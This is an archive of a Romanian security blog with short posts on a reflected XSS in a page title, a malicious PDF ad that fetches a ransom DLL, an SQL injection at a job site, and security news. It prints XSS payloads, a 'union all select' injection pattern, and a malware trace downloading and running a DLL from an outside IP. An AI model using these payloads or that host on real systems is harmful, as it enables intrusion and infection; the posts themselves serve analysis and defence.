You are currently browsing the category archive for the ‘Uncategorized’ category.

I like to recommend you a good reading, related with the future of the Security Industry and what need to be changed in the way how the Information Security is exercised. (The Future of Security The Trends and Technologies Transforming Security).

Happy reading

Anunțuri

I was kind of looking (pentester way) on a website and I saw that they could have a XSS flaw on the search field. Inserting the following string „<b>tester” on the search field, it get reflected back but just on the <title> tag like this.

<title>Cauta <b>tester – ……………</title>

There is a classical XSS, but what made that one interesting to me was the <title> tag.

<title>Cauta<script>alert(1);</script> – ……………</title>  => is not working

but

</title><script>alert(1)</script>&submit=Cauta => is working

Speaking with a friend, he gave me also an alternative the idea of inserting the <body> tag and create in this way a new HTML document.

So:

</title><body onload=’javascript:alert(1)’>

worked also like a charm.

Prima parte o puteti citi aici .

Dupa analiza trafiiculuui am ajuns la concluzia ca ofertantul de publicitate este (www.trafficrevenue.net).

Una din reclamele acestui ofertant, gazduita si pe 990.ro (http://ads.endoftheinternet.org/ku44/yoxlazgmkoaojme.pdf) contine un fisier pdf. (md5:675ec6a025d50f7dafef3992b46b7d41). Acest fisier contine un script java care are codul obfuscat. O incercare de a decoda codul javascript cu ajutorul (jsunpack-n.py) a condus la erori referitoare la inconsistenta codului java. Cine este interesat poate obtine o copie a acestului PDF.

Ceea ce face  pdf-ul destul de interesant este faptul ca modul in care a fost inserat scriptul  java  il face invizibil la tool-urile create de Didier Stevens.

Aceste tool-uri (pdfid si pdfparser) sunt folosite pentru a identifica continuturi periculoase in documente de tip pdf. Intre timp au fost incorporate si in site-ul de analiza a fisierelor suspicioase virustotal.com.

Pentru a putea sa decodez codul java am folosit site-ul Wepawet care a detectat codul java si l-a de-obfuscat. Dupa cum se poate vedea, scriptul java downloadeaza un fisier dll (wpbt0.dll).

Acest fisier modifica cheia shell din registri, blocheaza functionarea calculatorului si afiseaza apoi un mesaj cerand in limba germana plata unei recompense pentru a putea permite refolosirea calculatorului.

0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://62.109.12.153/ku44/isf.php?i=8, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)

 

Ce se poate face? Cum am spus si in prima parte – firefox cu noscript.

PS. Puteti sa cititi in comentariile de la primul post punctul de vedere al administratorului site-ului 990.ro. Referitor la mesajul sau vreau doar sa subliniez ca este datoria administratorului sa verifice ce ofertanti de publicitate alege. Un simplu search pe google ar fi un inceput bun.

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, trafficrevenue.net appeared to function as an intermediary for the infection of 11 site(s) including shareapik.blogspot.com/, americanfootballphotos.com/, watchthewalkingdead.blogspot.com/.”

..in domeniul de securitate IT pare sa fie Certified Ethical Hacker. Intr-un comunicat de presa Departamentul de Aparare (DoD) al SUA a anuntat aprobarea oficiala a programului de certificare CEH ca baza de pornire in pregatirea personalui apartinind Departementului de Aparare.  Deci se pare ca cei de la CISSP trebuie sa vina cu ceva pentru a putea mentine interesul oamenilor pentru aceasta certificare. Cu siguranta contractele in domeniul securitatii vor incepe sa ceara certificarile cerute de cei de la DoD. Azi in America, miine in toata lumea. Are cineva ambele certificari si poate face o comparatie intre ele?

Cercetatorii de la Universitatea Cambridge, condusi de Ross Anderson,  au descoperit o noua problema de design a sistemului de autorizare a tranzactiilor cu ajutorul cip-ului si  a pin-urilor. Comunicatia dintre un card cu cip si un terminal se face printr-un protocol neautentificat, care informeaza terminalul ca autorizarea se poate face cu cip si pin, cu ajutorul semnaturii sau niciuna. Dar daca autorizarea s-ar face cu cip si semnatura? Cazul in care cardul ar transmite terminalului ca autorizarea se face pe baza de cip si semnatura, atunci banca crede ca autorizarea se face cu pin, si cip-ul ca se face prin intermediul semnaturii. Este inspaimantator, pentru ca in acest caz hotii de carduri nu au nevoie sa mai cunoasca pin-ul pentru a autoriza tranzactii. El trebuie doar sa pacaleasca terminalu si atunci poate introduce orice pin.

Aici un reportaj BBC despre cit e de usor, si articolul original poate fi citit  aici cit si comentariile despre lui Bruce Schneier.

Aveti grija cu cardurile pierdute.

Distributia de pentesting Backtrack versiunea 4 finala a fost facut public ieri . Mai multe informatii aici.

Pentru cine nu are rabdare Download direct aici .

Have fun.

Compania Rapid7 a anuntat intr-un comunicat de presa ca a achizitionat proiectul open source Metasploit pentru al integra in solutia de management al vulnerabilitatilor pe care o ofera. HD Moore, omul din spatele proiectului va fi angajat de Rapid7, devenind astfel Chief Security Officer si ramine in acelasi timp principalul arhitect al proiectului Metasploit. Sper din tot sufletul ca proiectul va ramine Open pentru comunitate. Ar fi pacat sa devina o alta solutie comerciala.

Have fun,

Vazuta si primita de la Bogdan. Multumesc.

Ce parere aveti?

Astazi am citit un post interesant unde se punea urmatoarea intrebare:

Which would you rather tell the board or your customers? (1) „We had no security incidents last year, and aren’t sure why,” or (2) „Our customer database was pillaged 9 times, despite a cross-organizational investment in ISO 27001 which was aligned with our balanced scorecard and measured to be in the top quartile of all infosec programs?”

Interesanta intrebare. :-)) Miine si articolul ….de unde provine.
Have fun.

Ieri a fost conferinta de securitate realizata de Bussines Standard unde a venit si domnul Varujan Pambuccian(tot respectul pentru dumnealui). Dansul a spus in alocutiunea sa ca noi ar trebui sa-l respectam pe hackerul Vladut, pentru inventivitatea si desteptaciunea sa. La intrebarea mea de ce ar trebui respect,  mi-a raspuns ca este normal sa-ti respecti adversarii. Eu nu-l vad pe Vladut ca pe un adversa si inteleg ca trebuie sa respectam un smecher care s-a folosit de nestiinta si naivitatea unor oameni pentru a accesa niste conturi de e-mail.

Eu nu vreau sa respect genialitatea unui infractor. Eu vreau sa respect genialitatea oameniilor care scriu cod pentru produse de antivirus, sisteme de operare sau care creeaza produse soft de calitate. Eu ii respect pe oamenii care l-au prins.  Eu aleg sa il respect pe Marian Selea.

„Cisco IOS Software operates on millions of systems from small home-office routers to the world’s largest service provider networks. But its inherent accessibility is perhaps described best by Marian Selea, a blind Cisco support engineer who provides Cisco IOS customer support daily.”

Acestea sint valorile pe care le respect.

A-l respecta pe Vladut este ca si cum noi ar trebui sa respectam pe cel care in loc sa ne atraga atentia ca portofelul ne cade din buzunar, ni-l fura si apoi ride de noi ca am fost atit de fraierieri.

Pentru a pregati conferinta am inceput sa ma uit putin la Youtube.  Modulul de resetare a parolei si cel de schimbare a ei trimit username-ul si parola in necriptat. How lame for Youtube.  Have fun.

Parola Necriptata Youtube.

M-am hotarit din mai multe motive sa ofer celor de la ejobs o consultatie pro bono pentru a intelege care este cauza si sa arat si ce ar trebui sa faca ca sa poata evita o noua problema de securitate.

Ceea ce s-a intimplat este un caz standard de SQL Code Injection. Parametrul http://www.ejobs.ro/arhiva/2007/august/PARAMETRU%20union%20select … nu este verificat. Atunci cind este interogata baza de date ceva de genul „select asta, siasta from mydatabase where zi = PARAMETRU”,  este modificat acest select si completat cu „union all select 1, concat (nume coloana,:,altnume coloana) from companies limit by nr” .  In construirea acestui statement este foarte important sa se cunoasca numele coloanelor, si numele tabelei. Modul in care se poate obtine este ori daca aplicatia intoarce erori sql, sau prin metoda de brute force.

Ce s-ar fi putut face?

1). La nivel de limbaj de programare este datoria programatorului sa scrie statementul SQL in asa fel incit sa nu permita continuarea lui. Recomand tuturor o documentatie mai veche dar buna si acum.

2) Defence in depht . Ceea ce inseamna un application firewall de genul mod_security pentru Apache care sa filtreze stringurile de genul „union all select”.

3) Design Flow. Nici o aplicatie nu ar trebui sa stocheze parolele in clar. Se pot stoca in format hash (SHA1) si verificat hash-ul parolei user-ului cind acesta o introduce.

4) Awareness. Compania ar fi trebuit sa implice pe cineva specializat in securitate pentru a testa aplicatia. Oricum se pare ca ejobs nu are nici o procedura de incident management, pentru ca lucrul pe care il face acum este sa treaca totul sub tacere.

Pentu cei care dau peste asemenea erori de securitate: exista conceptul de responsible disclosure.

O zi minunata

Versiunea 3 a distributiei live, care este dedicata in primul rind auditurilor de securitate, va fii finalizata si prezentata la congresul Chaos Computer Club din Berlin care are loc intre 27 – 30 12.2007. Un tool care merita toata atentia este portbunny-ul lui FX, un port scanner care este conceput pentru scanneri de domenii mari de adrese de IP si este mult mai rapid decit celebrul nmap. Despre portbunny-ul lui Felix voi vorbi mai mult intr-un post urmator. Si ca intotdeauna: Have fun 🙂

Acum exista si oficial. Poti cumpara propriul tau 0-day. Frima Wabisabilab ofera o platforma de licitatie pentru exploit-uri. Cu 500 de EUR poti cumpara un exploit pentru PhpMyAdmin sau daca te tine buzunarul dai 5000 de EUR pentru un exploit de SAP GUI. Hmmmm….cine o fii oare in spatele acestei firme care din intimplare are sediul in Elvetia? Voi ce parere aveti?

Odata cu modificarea legii penale germane din (11. August 2007), prin introducerea articolului 202c se inchide poarta tuturor cercetatorilor germani din domeniul securitatii. Ce stipuleaza acest articol si care sint implicatiile modificarii legii()?

(1) Wer eine Straftat nach § 202a oder § 202b vorbereitet, indem er

1. Passworte oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202a
Abs. 2) ermöglichen, oder

2. Computerprogramme, deren Zweck die Begehung einer solchen Tat ist,
herstellt, sich oder einem anderen verschafft, verkauft, einem anderen überlässt, verbreitet
oder sonst zugänglich macht, wird mit Freiheitsstrafe bis zu einem Jahr oder mit
Geldstrafe bestraft.

O traducere aproximativa ar fii ca: Cei care publica parole sau coduri de acces care permit logarea intr-un sistem informatic sau cei care dezvolta, vind, folosesc sau fac public programe soft, a caror scop poate fi accesarea ilegala a unui sistem informatic sint pasibili de pedeapsa cu privarea de libertate pina la un an sau amenda.

Consecintele a acestei modificari sint inchiderea site-ului german al clubului THC, eliminarea uneia din cele mai buna liste de parole default pentru sisteme informatice de pe sie-ul celor de la Pheneolit si eliminarea tuturor POC pentru PHP de pe site-ul lui Stefan Esser si lista ar putea continua.

Intr-un interviu cu HD Moore, liderul proiectului Metasploit, el declara ca tot framework-ul si documentatia aferenta cad sub incidenta acestei legi si din cauza asta va evita orice calatorie in Germania. Oricum conform lui toate distibutiile de linux ar putea fii considerate ilegale din moment ce majoritate au integrat programul nmap.

Ce consecinte se pot trage? Numarul de tool-uri create pentru analizele de securitate vor fii din ce in ce mai mic si calitatea lor va scade datorita imposibilitatii comunitatii de a-si aduce aportul la imbunatatirea lor. Procurarea unor astfel de tool-uri va fii posibila numai daca ai contact direct cu dezvoltatorul iar detinerea lor va fii ilegala.

Sper ca Romania, odata cu alinierea la Recomandarile 2006/24/EG din 15 martie 2006 privitoare la combaretea criminalitatii in spatiul Internet, sa nu se inchida inchida poarta cercetatorilor romani din acest domeniu cum a fost facut in Germania.

Google a cumparat compania Postini, o companie specializata in securizarea sistemelor de e-mail, criptare si instant messaging. O mutare interesanta, care urmareste probabil dezvoltare de soluti enterprise de messaging. Google nu a reusit sa impresioneze analistii, si de aceea planuieste probabil ori o mutare catre piata enterprise ori sa cumpere DoubleClick, o companie care este specializata in reclama pe bannere.

Steve Orrin The SOA/XML Threat Modeling.

O prezentare foarte buna despre atacurile din lumea XML si a serviciilor web. Atacurile care au luat amploare pare a fi XML schema abuse. O prezentare foarte buna.

Dan Kaminsky Black Ops 2007.

Omul care a impachetat trafic DNS in trafic DNS, pune in aplicare o alta gluma a sa IP over SPAM. Astepta-ti inregistrarea pe site-ul de la DefCon. Merita vazuta.

Panel Internet War.

Concluziile directorului „Internet Storm Center”: Atacurile devin din ce in ce mai specifice si directionate catre indivizi sau grupuri de useri si incep sa combine lumea reala cu cea virtuala. Cum?. Unul dintre ultimii trojan-i chinezi fura identitati pentru a crea muncitori in jocul Warcraft care extrag aur , ce era apoi vindut in lumea reala. Modalitate frumoasa de a spala bani.

Dan Habbard Honeyjax

Porind de la comceptul de Honeypot, Honeyjax-urile sint programe care sint folosite in site-urile de genul myspace.com sau linkedin.com pentru a detecta boot-urile ce au ca target furturi de identitati. Programele resprective sint in stare sa initieze contacte sau sa accepte contacte si sa raspunda la mesaje.

Avis Raff – Widgets and Gadgets,

Vista vine cu ele, iGoogle se bazeaza pe ele. Elemente care infrumuseteaza paginile dar care aduc si insecuritate. Exemple de exploi pentru vista folosind un widgets si cum se poate cred un trojan care sa citeasca mail-urile de la Google bazat pe Widgets.

Brendon O’Conner Internet Banking in USA.

Presentarea a fost buna dar a fost specifica sistemului bancar american . Bine ca lumea nu copiaza America in privinta modalitatilor de combatere a phising-ului.

Concluzie

O editie foarte buna unde a cistigat la CTF (Capture the Flag) 1@stplace. Lumea incearca sa redefineasca conceptul de exploiting, indepartindu-se de OS exploiting si concentringu-se pe aplicatii.

Chiar daca blogul meu este un blog de securitate, nu pot sa nu ma opresc si sa lacrimez pentru omul care m-a invatat sa ascult John Lennon, si care refuza sa pronunte numele celui care l-a impuscat, sau sa-i inteleg pe Stones si care m-a facut sa inteleg si sa iubesc muzica rock de calitate. Dumnezeu sa-ti aiba in paza sufletul de hoinar . Cred ca ar trebui sa deschida cineva un site in care sa scriem toate amintirile despre el.

La Blackhat-ul de anul acesta nu va participa si celebrul researcher german in domeniu de reverse engineering Halva Flake. De ce? Pentru ca autoritatile americane au hotarit dupa 4 ore de interviu ca viza lui nu se potriveste cu tipul de acrivitate pe care o va desfasura si USA. Mai sa fie….nu e prima data cind Halva vine in US si face conferinte si training-uri. Care era oare tema prezentarii lui Halva pentru anul asta? Mai multe despre incident puteti citi aici

Si in alta ordine de idei, pentru ca am sansa sa fiu la Defcon anul asta o sa incers sa fac pentru prima data live blogging. Sa vedem ce iese.

Uitindu-ma ieri dupa „Linkin Park” am avut parte de unul din cele mai interesante mesaje de „500 Internal Server Error” vazute vreodata. Ingeniosi baietii de la Youtube, pentru ca au gasit o metoda de a permite mesaje de eroare care totusi sa nu poata fi folosite pentru un viitor atac. Ma intreb oare ce algoritm de cripare au folosit, ca base64 nu e ;-)? Voi ce ziceti?

Youtube 500 Internal server Error

Septembrie 2017
L M M M V S D
« Mar    
 123
45678910
11121314151617
18192021222324
252627282930